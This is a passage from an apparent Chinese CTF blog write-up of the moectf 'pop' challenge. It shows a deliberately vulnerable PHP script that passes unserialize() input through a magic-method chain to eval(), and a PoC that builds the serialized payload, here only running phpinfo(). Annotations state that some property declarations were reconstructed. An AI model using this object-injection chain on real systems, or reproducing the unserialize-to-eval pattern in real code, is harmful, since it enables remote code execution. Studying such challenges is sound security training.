moectf-pop

moectf-pop


将近半年没有接触反序列化,上手竟觉得如此生疏,贴一下原题和poc


原题


<?php

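/**
 * Entry point of the gadget chain.
 *
 * PHP calls __destruct() on every instance when it is released, including
 * instances that unserialize() rebuilt from request data, so check() runs
 * without any explicit call from the script.
 */
class class000
{
    // NOTE(review): the property declarations were garbled on the page (only a
    // stray "ni" survived, which is a parse error). They are reconstructed from
    // how check() reads them and from the PoC's `private $payl0ad`; the default
    // of 0 and the visibility of $what are assumptions, so confirm them against
    // the original challenge source.
    private $payl0ad = 0;
    protected $what;

    /**
     * Runs automatically on object destruction and hands over to check().
     */
    public function __destruct()
    {
        $this->check();
    }

    /**
     * Aborts unless $payl0ad differs from int 0, then calls $what as a function.
     *
     * SECURITY: both properties come straight from the serialized input, so the
     * guard is satisfied by any non-zero value and the "callable" may be any
     * object that defines __invoke() (class001 in this file).
     */
    public function check()
    {
        // Strict comparison: only the integer 0 stops execution here.
        if ($this->payl0ad === 0) {
            die('FAILED TO ATTACK');
        }

        $callable = $this->what;
        $callable();
    }
}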

/**
 * Second link of the chain: an object that can be called like a function.
 *
 * class000::check() calls whatever its $what property holds; if that is a
 * class001 instance, PHP runs __invoke().
 */
class class001
{
    // Value that __invoke() writes to the target object.
    public $payl0ad;

    // Object that receives the property write.
    public $a;

    /**
     * Assigns $payl0ad to the "payload" property of the object stored in $a.
     *
     * Note the spelling: "payload" (letter o) is not the same name as this
     * class's "payl0ad" (digit 0). class002 declares no such property, so when
     * $a is a class002 instance the write is routed to class002::__set().
     */
    public function __invoke()
    {
        $this->a->payload = $this->payl0ad;
    }
}

/**
 * Third link of the chain: turns a property write into a method call.
 */
class class002
{
    // Object handed on to the method that __set() selects; filled from the
    // serialized input.
    private $sec;

    /**
     * Magic setter, invoked when an undeclared or inaccessible property is written.
     *
     * SECURITY: the assigned VALUE ($b) is used as a method name on $this, so
     * whoever controls the value picks which method of this class runs. The
     * property name ($a) is ignored.
     *
     * @param string $a name of the property being written (unused)
     * @param mixed  $b value being written, treated here as a method name
     */
    public function __set($a, $b)
    {
        $this->$b($this->sec);
    }

    /**
     * Calls evvval() on the given object, passing $sec as the argument.
     *
     * When reached through __set(), $whaattt is $sec itself, so the object ends
     * up receiving itself as the argument.
     *
     * @param object $whaattt object expected to expose an evvval() method
     */
    public function dangerous($whaattt)
    {
        $whaattt->evvval($this->sec);
    }
}

/**
 * Last link of the chain: the code-execution sink.
 */
class class003
{
    // Text returned when the object is converted to a string.
    public $mystr;

    /**
     * Evaluates the argument as PHP code.
     *
     * SECURITY: eval() on data that originates from unserialize() of a request
     * parameter is arbitrary code execution. It is the intended sink of this
     * challenge and is left unchanged; never keep a pattern like this in real
     * code.
     *
     * @param mixed $str code to run; an object passed here is converted to a
     *                   string first, which is where __tostring() comes in
     */
    public function evvval($str)
    {
        eval($str);
    }

    /**
     * String conversion hook. PHP matches method names case-insensitively, so
     * this is the __toString() magic method despite the lowercase spelling.
     */
    public function __tostring()
    {
        return $this->mystr;
    }
}

// SECURITY: unserialize() on a request parameter lets the client decide which of
// the classes above are instantiated and what their properties contain; the
// magic methods (__destruct, __invoke, __set, __tostring) then run on that
// state. This is the deliberate flaw of the challenge and is left as-is.
// In real code, decode untrusted input with json_decode(), or at the very least
// call unserialize($data, ['allowed_classes' => false]).
if (!isset($_GET['data'])) {
    // No input supplied: print this file's own source.
    highlight_file(__FILE__);
} else {
    // The chain starts once the rebuilt object is destroyed, at the latest when
    // the script ends.
    $a = unserialize($_GET['data']);
}

Poc


<?php

/**
 * Payload-side stand-in for the challenge's class000.
 *
 * serialize() records only the class name and property values, so the stub
 * needs no methods.
 */
class class000
{
    // Any value other than int 0 passes the `=== 0` test in the target's check().
    private $payl0ad = 1;

    // Placeholder default; the script below overwrites it with a class001 object.
    public $what = 'class001';
}

/**
 * Payload-side stand-in for the challenge's class001 (properties only).
 */
class class001
{
    // Placeholder default; the script below replaces it with 'dangerous'.
    public $payl0ad = 'echo';

    // Set below to the class002 object that receives the property write.
    public $a;
}

/**
 * Payload-side stand-in for the challenge's class002 (properties only).
 */
class class002
{
    // Declared public here so the script can assign it directly; the challenge
    // source declares this property private.
    public $sec;
}

/**
 * Payload-side stand-in for the challenge's class003 (properties only).
 */
class class003
{
    // Text the challenge's __tostring() returns and evvval() then evaluates.
    public $mystr;
}

// Build the object graph from the sink outwards. serialize() walks it from the
// outermost object, so the order of these assignments does not affect the output.

// class003: holds the PHP source text. phpinfo() is only a harmless marker that
// execution happened; the trailing ';' is needed because eval() parses full
// statements.
$sink = new class003;
$sink->mystr = 'phpinfo();';

// class002: its __set() calls the method named by the assigned value, passing $sec.
$dispatcher = new class002;
$dispatcher->sec = $sink;

// class001: __invoke() writes $payl0ad into $a->payload, which triggers the
// __set() above with 'dangerous' as the value.
$invoker = new class001;
$invoker->a = $dispatcher;
$invoker->payl0ad = 'dangerous';

// class000: its destructor calls check(), which invokes $what.
$entry = new class000;
$entry->what = $invoker;

// urlencode() keeps the NUL bytes of the private property name intact when the
// string is placed in a query parameter.
echo urlencode(serialize($entry));
?>

这里要特别注意:eval 函数执行的是 PHP 代码,所以传入的字符串末尾记得带上“;”


写在后面


最近心情是真的低落,有点回到疫情的时候的感觉了。去年夏天的阴影还是没法缓解,每每想起就害怕得想哭。估计是呆在家里太久,把人闷出事了。希望能赶快调整回来